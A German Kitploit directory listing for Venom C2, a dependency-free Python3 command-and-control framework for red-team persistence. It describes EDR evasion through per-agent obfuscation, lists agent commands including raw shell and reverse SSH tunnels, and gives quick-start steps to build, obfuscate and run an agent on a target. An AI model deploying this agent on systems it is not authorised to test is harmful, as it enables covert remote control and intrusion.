Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
venom — Venom C2 ist ein abhängigkeitsfreies Python3 Command-&-Control-Framework für die Persistenz in Red-Team-Operationen. | Kitploit
Tools/GitHubGitHub/boku7/venom
Verschlüsselungs-/EntschlüsselungstoolsPayload-GenerierungPersistenzmechanismenLaterale BewegungShellcodePost-ExploitationCommand and ControlRed TeamingRemote-Access-Tool
GitHubboku7/venom

venom

Venom C2 ist ein abhängigkeitsfreies Python3 Command-&-Control-Framework für die Persistenz in Red-Team-Operationen.

43675vor 9 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Venom C2

Venom C2 ist ein abhängigkeitsfreies Python3-Kommando- und Kontroll-Framework für Redteam-Persistenz, das entwickelt wurde, um auf Systemen ohne Installation von Paketen zu laufen. Es besteht aus einem Flask-Teamserver, einer Electron-Operator-GUI und einem Single-File-Python-Agenten, der über HTTP/HTTPS mit konfigurierbaren AES-verschlüsselten JSON-Nachrichten kommuniziert. Verwenden Sie es, um Befehle auszuführen, Dateien zu verwalten, Zugriff aufrechtzuerhalten und SSH-Reverse-Tunnel von kompromittierten Systemen zu erstellen.

Hintergrund

Beim Eskalieren von Netzwerkprivilegien landeten wir auf vielen Produktionssystemen mit exotischen Distributionen und Architekturen. Wir wollten Persistenz einrichten, aber unser Arsenal an Tools und Techniken funktionierte nicht. Zusätzlich liefen auf einigen der Zielsysteme EDR.

Dies waren Produktionssysteme, daher wollten wir keine Pakete installieren. Wir brauchten einen C2-Agenten, der ohne Abhängigkeiten läuft. Die Systeme hatten Python3 installiert, also erstellte ich Venom C2 mitten im Engagement: einen abhängigkeitsfreien Python3-C2-Agenten, der einfach funktioniert.

Wir wollten keine Standard-C2-Agenten verwenden, wegen des Risikos, dass sie zur Erkennung durch das Blue Team führen könnten. Einzigartiger Code ist der König für die Umgehung moderner EDRs

Da es viele Systeme gab, automatisierten wir einzigartige Verschleierung, Benennung, Dateisystemplatzierung, verschiedene Netzwerk-Callback-Domains und eindeutige Netzwerkpfad-Anfragen pro Agent.

Ich nannte es Venom, weil mein Sohn den Venom-Bösewicht aus Spider-Man liebt. Außerdem ist Python eine Schlange und coole Schlangen haben Gift, also schien es gut zu passen.

Venom C2 Zukunft

Es gibt keine.

Dies war nur ein einmaliges C2-Projekt, das ich mitten im Engagement durchführte. Es dauerte etwa 2 Tage Entwicklung, um es in der Zielumgebung stabil und zuverlässig zu bekommen. Es erfüllte seinen Zweck, verschaffte uns für die restlichen 6 Wochen des Engagements Persistenz im Netzwerk. Ich habe keine Pläne, dieses Projekt weiterzuentwickeln oder zu nutzen, also dachte ich, es sei ein guter Kandidat für eine öffentliche Veröffentlichung.

Sonst wäre es einfach im devNULL verloren gegangen...

devnull

Venom C2 Komponenten & Funktionen

Server

  • Python3 Flask
  • Teamserver, der mehrere Operatoren unterstützt
  • Speichert Befehlsverlauf
  • Skript zum Konfigurieren von Agenten
  • Skript zum Verschleiern von Agenten
  • Verwaltet Agentenverbindungen
  • API zur Kommunikation mit dem GUI-Client
  • Benutzerdefinierte Profile mit zufälliger Auswahl aus großen Arrays von:
    • C2-Nachrichtenparameternamen
    • Zufällige Header
    • Zufällige JSON-Attribute mit skalierbaren Werttypen

Client GUI

  • Electron
  • Funktioniert unter Linux, macOS, Windows
  • GUI ist eine abgespeckte Version der Loki-GUI

Agent

  • Python3 ohne Abhängigkeiten
  • Nachrichten werden mit konfigurierbaren AES-Schlüsseln verschlüsselt
  • Alle Nachrichten werden als JSON-POST-Anfragen gesendet
  • Benutzerdefinierte Profile mit zufälliger Auswahl aus großen Arrays von:
    • URI-Basispfade (nützlich für die Einrichtung von Reverse-Proxy-Routing)
    • Mehrere URI-Pfade für jede Agentenfunktion
    • C2-Nachrichtenparameternamen
    • User-Agents
    • Zufällige Header
    • Zufällige JSON-Attribute mit skalierbaren Werttypen

Agentenbefehle

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Display this help menu
ls       : List directory contents
pwd      : Show current working directory
cd       : Change directory
cat      : Display file contents
mv       : Move/rename files or directories
cp       : Copy files or directories
mkdir    : Create directory
rmdir    : Remove empty directory
write    : Write content to file
chmod    : Change file permissions
rm       : Remove (delete) files
shell    : Execute raw shell command
sleep    : Make agent sleep with optional jitter
sshrev   : Create reverse SSH tunnel
kill     : Terminate agent process
upload   : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box

Schnellstart

1. Code auf den Server holen

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. Serveranforderungen installieren (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. Server starten

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • Beim ersten Start werden Admin-Benutzername und -Passwort in der Konsole ausgegeben. Kopieren und speichern Sie diese, um den Client am Server zu authentifizieren.
  • Oder legen Sie eigene fest: python3 server.py --adduser <USERNAME> <PASSWORD>

4. Client auf der Workstation ausführen

Führen Sie die Client-Benutzeroberfläche auf Ihrer Workstation aus (nicht auf dem Server). Sie muss den Server erreichen können.

root@kitploit:~
cd ../client
npm install
npm run start

Öffnen Sie den Client, gehen Sie zu Config und geben Sie die Server-Anmeldeinformationen ein.

Sicherheit

Der clientseitige API-Basispfad des Servers ist /api/. Setzen Sie /api/ nicht dem öffentlichen Internet aus. Verwenden Sie VPN oder strenge Firewall-/Reverse-Proxy-Regeln, sodass nur vertrauenswürdige Clients darauf zugreifen können.

5. Agent erstellen

Aus dem server-Verzeichnis:

root@kitploit:~
python3 agent_create.py -H <server_host> -P <server_port> [-http]

6. Agent verschleiern

Aus dem server-Verzeichnis:

root@kitploit:~
python3 agent_obfuscate.py agents/<generated_agent_file>.py

7. Agent ausführen

Wird auf dem Zielcomputer ausgeführt, den Sie steuern möchten.

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
Tool herunterladen